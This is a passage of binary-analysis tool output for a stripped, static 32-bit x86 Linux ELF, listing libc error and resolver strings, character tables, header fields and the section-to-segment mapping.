668 0x00018bc6 0x08060bc6 45  46   .rodata ascii   Cannot send after transport endpoint shutdown
669 0x00018bf4 0x08060bf4 34  35   .rodata ascii   Too many references: cannot splice
670 0x00018c17 0x08060c17 20  21   .rodata ascii   Connection timed out
671 0x00018c2c 0x08060c2c 18  19   .rodata ascii   Connection refused
672 0x00018c3f 0x08060c3f 12  13   .rodata ascii   Host is down
673 0x00018c4c 0x08060c4c 16  17   .rodata ascii   No route to host
674 0x00018c5d 0x08060c5d 29  30   .rodata ascii   Operation already in progress
675 0x00018c7b 0x08060c7b 25  26   .rodata ascii   Operation now in progress
676 0x00018c95 0x08060c95 21  22   .rodata ascii   Stale NFS file handle
677 0x00018cab 0x08060cab 24  25   .rodata ascii   Structure needs cleaning
678 0x00018cc4 0x08060cc4 27  28   .rodata ascii   Not a XENIX named type file
679 0x00018ce0 0x08060ce0 29  30   .rodata ascii   No XENIX semaphores available
680 0x00018cfe 0x08060cfe 20  21   .rodata ascii   Is a named type file
681 0x00018d13 0x08060d13 16  17   .rodata ascii   Remote I/O error
682 0x00018d24 0x08060d24 19  20   .rodata ascii   Disk quota exceeded
683 0x00018d38 0x08060d38 15  16   .rodata ascii   No medium found
684 0x00018d48 0x08060d48 17  18   .rodata ascii   Wrong medium type
685 0x00018d5a 0x08060d5a 13  14   .rodata ascii   Unknown error
686 0x00018d68 0x08060d68 41  42   .rodata ascii   Address family for hostname not supported
687 0x00018d92 0x08060d92 36  37   .rodata ascii   Temporary failure in name resolution
688 0x00018db7 0x08060db7 22  23   .rodata ascii   Bad value for ai_flags
689 0x00018dce 0x08060dce 42  43   .rodata ascii   Non-recoverable failure in name resolution
690 0x00018df9 0x08060df9 23  24   .rodata ascii   ai_family not supported
691 0x00018e11 0x08060e11 25  26   .rodata ascii   Memory allocation failure
692 0x00018e2b 0x08060e2b 35  36   .rodata ascii   No address associated with hostname
693 0x00018e4f 0x08060e4f 25  26   .rodata ascii   Name or service not known
694 0x00018e69 0x08060e69 38  39   .rodata ascii   Servname not supported for ai_socktype
695 0x00018e90 0x08060e90 25  26   .rodata ascii   ai_socktype not supported
696 0x00018eaa 0x08060eaa 12  13   .rodata ascii   System error
697 0x00018eb7 0x08060eb7 30  31   .rodata ascii   Processing request in progress
698 0x00018ed6 0x08060ed6 16  17   .rodata ascii   Request canceled
699 0x00018ee7 0x08060ee7 20  21   .rodata ascii   Request not canceled
700 0x00018efc 0x08060efc 17  18   .rodata ascii   All requests done
701 0x00018f0e 0x08060f0e 23  24   .rodata ascii   Interrupted by a signal
702 0x00019017 0x08061017 16  17   .rodata ascii   0123456789abcdef
703 0x00019048 0x08061048 24  25   .rodata ascii   %u.%u.%u.%u.in-addr.arpa
704 0x00019061 0x08061061 6   7    .rodata ascii   %x.%x.
705 0x00019068 0x08061068 8   9    .rodata ascii   ip6.arpa
706 0x00019303 0x08061303 10  11   .rodata ascii   \b/dev/null
707 0x0001972e 0x0806172e 7   16   .rodata utf16le \a\b\t\n\v\f\r
708 0x00019760 0x08061760 95  192  .rodata utf16le  !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
709 0x00019927 0x08061927 5   6    .rodata ascii   L(knN
710 0x0001992e 0x0806192e 5   6    .rodata ascii    Ainf
711 0x000199fc 0x080619fc 13  14   .rodata ascii   /etc/services
712 0x00019a13 0x08061a13 16  17   .rodata ascii   /etc/resolv.conf
713 0x00019a24 0x08061a24 23  24   .rodata ascii   /etc/config/resolv.conf
714 0x00019a3c 0x08061a3c 10  11   .rodata ascii   nameserver
715 0x00019a47 0x08061a47 6   7    .rodata ascii   domain
716 0x00019a4e 0x08061a4e 6   7    .rodata ascii   search
717 0x00019a55 0x08061a55 10  11   .rodata ascii   /etc/hosts
718 0x00019a60 0x08061a60 17  18   .rodata ascii   /etc/config/hosts
0   0x00019ac7 0x08062ac7 7   8    .data   ascii   \a\b\t\n\v\f\r
1   0x00019ae0 0x08062ae0 95  96   .data   ascii    !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
2   0x00019bc0 0x08062bc0 4   5    .data   ascii   {N`n
3   0x00019cac 0x08062cac 4   5    .data   ascii   WdpH
4   0x00019cb2 0x08062cb2 4   6    .data   utf8    -ֶ$\n blocks=Basic Latin,Hebrew
5   0x00019cb8 0x08062cb8 5   6    .data   ascii   Ryf!2
6   0x00019ce0 0x08062ce0 128 129  .data   ascii   %q*KC)&F98fsr2to4b3yi_:wB>z=;!k?"EAZ7.D-md<ex5U~h,j|$v6c1ga+p@un0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. 
7   0x0001a8f4 0x080638f4 6   9    .data   utf8    箂CAk[S blocks=CJK Unified Ideographs,Basic Latin
arch     x86
baddr    0x8048000
binsz    112717
bintype  elf
bits     32
canary   false
class    ELF32
compiler GCC: (GNU) 4.1.2
crypto   false
endian   little
havecode true
laddr    0x0
lang     c
linenum  false
lsyms    false
machine  Intel 80386
nx       true
os       linux
pic      false
relocs   false
rpath    NONE
sanitize false
static   true
stripped true
subsys   linux
va       true
0x00000000  ELF MAGIC   0x464c457f
0x00000010  Type        0x0002
0x00000012  Machine     0x0003
0x00000014  Version     0x00000001
0x00000018  Entrypoint  0x08048168
0x0000001c  PhOff       0x00000034
0x00000020  ShOff       0x0001b850
0x00000024  Flags       0x00000000
0x00000028  EhSize      52
0x0000002a  PhentSize   32
0x0000002c  PhNum       3
0x0000002e  ShentSize   40
0x00000030  ShNum       14
0x00000032  ShrStrndx   13
[Linked libraries]

0 library
[Relocations]

vaddr paddr type name
―――――――――――――――――――――


0 relocations
112717
Section to Segment mapping:
Segment   Section
-----------------
LOAD0     .init .text .fini .rodata .eh_frame 
LOAD1     .ctors .dtors .jcr .got.plt .data .bss 
GNU_STACK 
ehdr      


